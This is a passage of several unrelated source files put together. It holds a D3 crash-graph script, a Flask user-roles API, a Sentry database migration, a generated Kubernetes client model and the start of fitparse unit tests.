d3.select('#details').classed('visible', false);
return;
}
var mark = d3.select(d3.event.target);
if (!mark.classed('mark')) {
return;
}
var px = mark.property('cx').baseVal.value;
var py = mark.property('cy').baseVal.value;
var d = d3.select('#details');
d.property('transform').baseVal.getItem(0).setTranslate(px, py);
d.classed('visible', true);
d3.select('#detailsBuildID').text(mark.attr('buildid'));
d3.select('#detailsUsers').text("Users: " + mark.attr('users'));
d3.select('#detailsCrashCount').text("Crashes: " + mark.attr('crashcount'));
var scalex, scaley, offsetx, offsety;
if (px < %(graphWidth)s - %(detailsWidth)s) {
scalex = 1;
offsetx = 15;
}
else {
scalex = -1;
offsetx = -%(detailsWidth)s + 5;
}
if (py < %(graphHeight)s - %(detailsHeight)s) {
scaley = 1;
offsety = 2 + %(fontHeight)s;
} else {
scaley = -1;
offsety = -%(detailsHeight)s + 2;
}
d3.select('#detailBox').property('transform').baseVal.getItem(0).setScale(scalex, scaley);
d3.select('#detailText').property('transform').baseVal.getItem(0).setTranslate(offsetx, offsety);
});
""" % {'graphWidth': graph_width,
'graphHeight': height,
'fontHeight': fontHeight,
'detailsWidth': detailsWidth,
'detailsHeight': detailsHeight}))
d.write(fd)
if __name__ == '__main__':
fname, channel, label = sys.argv[1:]
cdata = csv.reader(open(fname))
builds = [RowType(buildid, intconvert(users), intconvert(crashcount))
for buildid, users, crashcount in cdata]
produce_graph(builds, channel, label, sys.stdout)
|
|
"""Role(s) API"""
from flask import Blueprint, abort, jsonify, request
from ..database import db
from ..extensions import oauth
from ..models.role import Role
from ..models.user import current_user, get_user
from .crossdomain import crossdomain
role_api = Blueprint('role_api', __name__)
@role_api.route('/api/roles')
@crossdomain()
@oauth.require_oauth()
def system_roles():
"""Returns simple JSON defining all system roles
Returns a list of all known roles. Users belong to one or more
roles used to control authorization.
---
tags:
- User
- Role
operationId: system_roles
produces:
- application/json
responses:
200:
description:
Returns a list of all known roles. Users belong to one or more
roles used to control authorization.
schema:
id: nested_roles
properties:
roles:
type: array
items:
type: object
required:
- name
properties:
name:
type: string
description:
Role name, always a lower case string with no white space.
description:
type: string
description: Plain text describing the role.
display_name:
type: string
description:
Display version of name field, title cased with whitespace
401:
description:
if missing valid OAuth token or if the authorized user lacks
permission to view roles
security:
- ServiceToken: []
"""
return jsonify(roles=[r.as_json() for r in Role.query.all()])
@role_api.route('/api/user/<int:user_id>/roles')
@crossdomain()
@oauth.require_oauth()
def roles(user_id):
"""Returns simple JSON defining user roles
Returns the list of roles the requested user belongs to.
---
tags:
- User
- Role
operationId: getRoles
parameters:
- name: user_id
in: path
description: TrueNTH user ID
required: true
type: integer
format: int64
produces:
- application/json
responses:
200:
description:
Returns the list of roles the requested user belongs to.
schema:
$ref: "#/definitions/nested_roles"
401:
description:
if missing valid OAuth token or if the authorized user lacks
permission to view requested user_id
security:
- ServiceToken: []
"""
user = get_user(
user_id, 'view', allow_on_url_authenticated_encounters=True)
return jsonify(roles=[r.as_json() for r in user.roles])
@role_api.route('/api/user/<int:user_id>/roles', methods=('POST',))
@crossdomain()
@oauth.require_oauth()
def add_roles(user_id):
"""Add roles to user, returns simple JSON defining user roles
Used to add role(s) to a user. See the PUT version for the idempotent
mechanism to define the complete set of roles for a user. This
endpoint will only POST a new role (or multiple roles) on a user.
If any of the roles POSTed are already defined for the user, a 409
will be raised.
Only the 'name' field of the roles is referenced. Must match
current roles in the system.
Returns a list of all roles associated with user after change.
---
tags:
- User
- Role
operationId: addRoles
produces:
- application/json
parameters:
- name: user_id
in: path
description: TrueNTH user ID
required: true
type: integer
format: int64
- in: body
name: body
schema:
$ref: "#/definitions/nested_roles"
responses:
200:
description:
Returns a list of all roles user belongs to after change.
schema:
$ref: "#/definitions/nested_roles"
400:
description: if the request includes an unknown role.
401:
description:
if missing valid OAuth token or if the authorized user lacks
permission to edit requested user_id
404:
description: if user_id doesn't exist
409:
description: if any of the given roles are already assigned to the user
security:
- ServiceToken: []
- OAuth2AuthzFlow: []
"""
user = get_user(user_id, 'edit')
if not request.json or 'roles' not in request.json:
abort(400, "Requires role list")
role_list = [Role.query.filter_by(name=role.get('name')).one()
for role in request.json.get('roles')]
user.add_roles(role_list, acting_user=current_user())
db.session.commit()
# Return user's updated role list
return jsonify(roles=[r.as_json() for r in user.roles])
@role_api.route('/api/user/<int:user_id>/roles', methods=('DELETE',))
@crossdomain()
@oauth.require_oauth()
def delete_roles(user_id):
"""Delete roles from user, returns simple JSON listing remaining roles
Used to delete role(s) from a user. See the PUT version for the
idempotent mechanism to define the complete set of roles for a user.
If any of the roles given are not currently defined for the user, a 409
will be raised.
Only the 'name' field of the roles is referenced. Must match
current roles in the system.
Returns a list of all roles associated with user after change.
---
tags:
- User
- Role
operationId: deleteRoles
produces:
- application/json
parameters:
- name: user_id
in: path
description: TrueNTH user ID
required: true
type: integer
format: int64
- in: body
name: body
schema:
$ref: "#/definitions/nested_roles"
responses:
200:
description:
Returns a list of all roles user belongs to after change.
schema:
$ref: "#/definitions/nested_roles"
400:
description: if the request includes an unknown role.
401:
description:
if missing valid OAuth token or if the authorized user lacks
permission to edit requested user_id
404:
description: if user_id doesn't exist
409:
description: if any of the given roles are not currently assigned to the user
security:
- ServiceToken: []
- OAuth2AuthzFlow: []
"""
user = get_user(user_id, 'edit')
if not request.json or 'roles' not in request.json:
abort(400, "Requires role list")
role_list = [Role.query.filter_by(name=role.get('name')).one()
for role in request.json.get('roles')]
user.delete_roles(role_list, acting_user=current_user())
db.session.commit()
# Return user's updated role list
return jsonify(roles=[r.as_json() for r in user.roles])
@role_api.route('/api/user/<int:user_id>/roles', methods=('PUT',))
@crossdomain()
@oauth.require_oauth()
def set_roles(user_id):
"""Set roles for user, returns simple JSON defining user roles
Used to set role assignments for a user. Include all roles
the user should be a member of. If user previously belonged to
roles not included, the missing roles will be deleted from the user.
Only the 'name' field of the roles is referenced. Must match
current roles in the system.
Returns a list of all roles associated with user after change.
---
tags:
- User
- Role
operationId: setRoles
produces:
- application/json
parameters:
- name: user_id
in: path
description: TrueNTH user ID
required: true
type: integer
format: int64
- in: body
name: body
schema:
$ref: "#/definitions/nested_roles"
responses:
200:
description:
Returns a list of all roles user belongs to after change.
schema:
$ref: "#/definitions/nested_roles"
400:
description: if the request includes an unknown role.
401:
description:
if missing valid OAuth token or if the authorized user lacks
permission to edit requested user_id
404:
description: if user_id doesn't exist
security:
- ServiceToken: []
- OAuth2AuthzFlow: []
"""
user = get_user(user_id, 'edit')
if not request.json or 'roles' not in request.json:
abort(400, "Requires role list")
role_list = [Role.query.filter_by(name=role.get('name')).one()
for role in request.json.get('roles')]
user.update_roles(role_list, acting_user=current_user())
db.session.commit()
# Return user's updated role list
return jsonify(roles=[r.as_json() for r in user.roles])
|
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'LostPasswordHash'
db.create_table('sentry_lostpasswordhash', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], unique=True)),
('hash', self.gf('django.db.models.fields.CharField')(max_length=32)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['LostPasswordHash'])
def backwards(self, orm):
# Deleting model 'LostPasswordHash'
db.delete_table('sentry_lostpasswordhash')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filterkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'FilterKey'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['auth.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Team']", 'null': 'True'})
},
'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'user_added': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['auth.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.team': {
'Meta': {'object_name': 'Team'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': "orm['auth.User']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
}
}
complete_apps = ['sentry']
|
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.23
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class DiscoveryV1EndpointPort(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'app_protocol': 'str',
'name': 'str',
'port': 'int',
'protocol': 'str'
}
attribute_map = {
'app_protocol': 'appProtocol',
'name': 'name',
'port': 'port',
'protocol': 'protocol'
}
def __init__(self, app_protocol=None, name=None, port=None, protocol=None, local_vars_configuration=None): # noqa: E501
"""DiscoveryV1EndpointPort - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._app_protocol = None
self._name = None
self._port = None
self._protocol = None
self.discriminator = None
if app_protocol is not None:
self.app_protocol = app_protocol
if name is not None:
self.name = name
if port is not None:
self.port = port
if protocol is not None:
self.protocol = protocol
@property
def app_protocol(self):
"""Gets the app_protocol of this DiscoveryV1EndpointPort. # noqa: E501
The application protocol for this port. This field follows standard Kubernetes label syntax. Un-prefixed names are reserved for IANA standard service names (as per RFC-6335 and http://www.iana.org/assignments/service-names). Non-standard protocols should use prefixed names such as mycompany.com/my-custom-protocol. # noqa: E501
:return: The app_protocol of this DiscoveryV1EndpointPort. # noqa: E501
:rtype: str
"""
return self._app_protocol
@app_protocol.setter
def app_protocol(self, app_protocol):
"""Sets the app_protocol of this DiscoveryV1EndpointPort.
The application protocol for this port. This field follows standard Kubernetes label syntax. Un-prefixed names are reserved for IANA standard service names (as per RFC-6335 and http://www.iana.org/assignments/service-names). Non-standard protocols should use prefixed names such as mycompany.com/my-custom-protocol. # noqa: E501
:param app_protocol: The app_protocol of this DiscoveryV1EndpointPort. # noqa: E501
:type: str
"""
self._app_protocol = app_protocol
@property
def name(self):
"""Gets the name of this DiscoveryV1EndpointPort. # noqa: E501
The name of this port. All ports in an EndpointSlice must have a unique name. If the EndpointSlice is dervied from a Kubernetes service, this corresponds to the Service.ports[].name. Name must either be an empty string or pass DNS_LABEL validation: * must be no more than 63 characters long. * must consist of lower case alphanumeric characters or '-'. * must start and end with an alphanumeric character. Default is empty string. # noqa: E501
:return: The name of this DiscoveryV1EndpointPort. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this DiscoveryV1EndpointPort.
The name of this port. All ports in an EndpointSlice must have a unique name. If the EndpointSlice is dervied from a Kubernetes service, this corresponds to the Service.ports[].name. Name must either be an empty string or pass DNS_LABEL validation: * must be no more than 63 characters long. * must consist of lower case alphanumeric characters or '-'. * must start and end with an alphanumeric character. Default is empty string. # noqa: E501
:param name: The name of this DiscoveryV1EndpointPort. # noqa: E501
:type: str
"""
self._name = name
@property
def port(self):
"""Gets the port of this DiscoveryV1EndpointPort. # noqa: E501
The port number of the endpoint. If this is not specified, ports are not restricted and must be interpreted in the context of the specific consumer. # noqa: E501
:return: The port of this DiscoveryV1EndpointPort. # noqa: E501
:rtype: int
"""
return self._port
@port.setter
def port(self, port):
"""Sets the port of this DiscoveryV1EndpointPort.
The port number of the endpoint. If this is not specified, ports are not restricted and must be interpreted in the context of the specific consumer. # noqa: E501
:param port: The port of this DiscoveryV1EndpointPort. # noqa: E501
:type: int
"""
self._port = port
@property
def protocol(self):
"""Gets the protocol of this DiscoveryV1EndpointPort. # noqa: E501
The IP protocol for this port. Must be UDP, TCP, or SCTP. Default is TCP. # noqa: E501
:return: The protocol of this DiscoveryV1EndpointPort. # noqa: E501
:rtype: str
"""
return self._protocol
@protocol.setter
def protocol(self, protocol):
"""Sets the protocol of this DiscoveryV1EndpointPort.
The IP protocol for this port. Must be UDP, TCP, or SCTP. Default is TCP. # noqa: E501
:param protocol: The protocol of this DiscoveryV1EndpointPort. # noqa: E501
:type: str
"""
self._protocol = protocol
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DiscoveryV1EndpointPort):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, DiscoveryV1EndpointPort):
return True
return self.to_dict() != other.to_dict()
|
|
#!/usr/bin/env python
import csv
import datetime
import os
from struct import pack
import sys
import warnings
from fitparse import FitFile
from fitparse.processors import UTC_REFERENCE, StandardUnitsDataProcessor
from fitparse.records import BASE_TYPES, Crc
from fitparse.utils import FitEOFError, FitCRCError, FitHeaderError, FitParseError
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
def generate_messages(mesg_num, local_mesg_num, field_defs, endian='<', data=None):
mesgs = []
base_type_list = []
# definition message, local message num
s = pack('<B', 0x40 | local_mesg_num)
# reserved byte and endian
s += pack('<xB', int(endian == '>'))
# global message num, num fields
s += pack('%sHB' % endian, mesg_num, len(field_defs))
for def_num, base_type in field_defs:
base_type = [bt for bt in BASE_TYPES.values() if bt.name == base_type][0]
base_type_list.append(base_type)
s += pack('<3B', def_num, base_type.size, base_type.identifier)
mesgs.append(s)
if data:
for mesg_data in data:
s = pack('B', local_mesg_num)
for value, base_type in zip(mesg_data, base_type_list):
s += pack("%s%s" % (endian, base_type.fmt), value)
mesgs.append(s)
return b''.join(mesgs)
def generate_fitfile(data=None, endian='<'):
fit_data = (
generate_messages(
# local mesg 0, global mesg 0 (file_id)
mesg_num=0, local_mesg_num=0, endian=endian, field_defs=[
# serial number, time_created, manufacturer
(3, 'uint32z'), (4, 'uint32'), (1, 'uint16'),
# product/garmin_product, number, type
